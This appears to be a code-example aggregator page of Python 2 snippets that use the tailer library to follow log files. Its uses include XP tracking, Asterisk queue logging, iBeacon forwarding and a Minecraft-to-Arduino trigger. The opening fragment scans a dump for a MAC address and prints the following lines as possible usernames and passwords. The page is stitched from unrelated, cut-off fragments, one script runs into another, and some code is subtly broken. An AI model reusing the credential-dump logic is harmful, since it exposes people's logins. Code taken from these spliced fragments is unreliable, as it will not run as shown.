			if done == 0:
				linecount+= 1
				if line == macaddr:
					sys.stdout.flush()
					done = 1
					print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
				else:
					sys.stdout.write(str(linecount)+"\r")
			elif done == 1:
				done = 2
				print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
			elif done == 2:
				done = 3
				print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
Example #50
0
        if amt > 250:
            red_flags.append(dm)

    else:
        pc_idx = next(idx for (idx, d) in enumerate(day_rec[dm]) if d['pc'] == pc)
        day_rec[dm][pc_idx]['amt'] += amt
        day_rec[dm][pc_idx]['details'].append((timestamp, amt))

        if day_rec[dm][pc_idx] > 250 and dm not in red_flags:
            red_flags.append(dm)


setup_dirs()

for line in tailer.follow(open('samplelog.txt')):

    #TODO: Better line validation. We don't want to try to parse
    # any non-XP entries (for now.)
    # Ignore an empty line rather than continuing
    if len(line) < 1:
        continue

    tokens = line.split('|')

    # Ignore if this isn't one of our special lines
    if len(tokens[0].split(']')) < 2:
        continue

    timestamp, dm_event, dm, pc, player, amt = parse_xp(tokens)
    _ = timestamp.split(' ')
Example #51
0
# -*- coding: utf-8 -*-
import tailer
from os import listdir
from os.path import isfile, join, sep, expanduser

path = expanduser("~")+sep+"logutil"+sep+"testFolder"
files = [ f for f in listdir(path) if isfile(join(path,f)) ]
sorted_files = sorted(files)
last_log_file = sorted_files.pop()
file_with_path=path+sep+last_log_file

for original in tailer.tail(open(file_with_path),50):
    print original

for line in tailer.follow(open(file_with_path)):
    print line
    print "Another instance is already running, quitting."
    time.sleep(1)
    sys.exit(-1)

class QueueLog(SQLObject):
    time = StringCol()
    callid = StringCol()
    queuename = StringCol()
    agent = StringCol()
    event = StringCol()
    data = StringCol()

connection = connectionForURI(dsn)
sqlhub.processConnection = connection

for line in tailer.follow(log_file):
    t = line.split(SEPARATOR)

    print t
    
    QueueLog(
	time = t[0], 
	callid = t[1],
	queuename = t[2],
	agent = t[3],
	event = t[4],
	data = SEPARATOR.join(t[5:])
    )


    
Example #53
0
route='/submit'

#base_url_def="http://ec2-54-184-199-186.us-west-2.compute.amazonaws.com"
base_url_def="http://localhost:7979"

if len(sys.argv) > 1:
    file_to_follow=sys.argv[1]
else :
    file_to_follow="/var/log/iBeacons.log"

if len(sys.argv) > 2:
    base_url=sys.argv[2]
else :
    base_url=base_url_def

url=base_url+route
print "collecting data from %s and sending to url %s" %(file_to_follow, url)

def publish_5(line):
    data=line.split(',')
    if len(data) != nitems:
        print "Warning did not find %s comma separated items. Skipping line." % nitems
    else :
        uuid,major,minor, rssi, date_str = data
        publish_it(url=url,uuid=uuid,major=major,minor=minor,rssi=rssi,date_str=date_str)

my_call_back=publish_5

for line in tailer.follow(open(file_to_follow)):
    my_call_back(line)
def getOrder():
	return tailer.follow(OrderFile,0)
Example #55
0
import tailer
import time
import serial
ser = serial.Serial('/dev/tty.usbmodem1461', 9600, timeout=None)
import tailer
for line in tailer.follow(open('/Users/Mike/Library/Application Support/minecraft/logs/latest.log')):
    if "Arduino LED Triggered" in line:
	print "Sending message to Arduino"
        ser.write('5')
    if "Something else" in line:
        ser.write('4')
 def ingest(self):
     for line in tailer.follow(open(self.path)):
         resSet=self.parseLine(line)
         self.producer.keyedProduce(resSet[0],resSet[1],resSet[2])
def getMatch():
	return tailer.follow(MatchFile,0)
Example #58
0
# -*- coding: utf-8 -*-
import tailer
from sys import argv

script, filename = argv

for original in tailer.tail(open(filename),50):
    print original

for line in tailer.follow(open(filename)):
    print line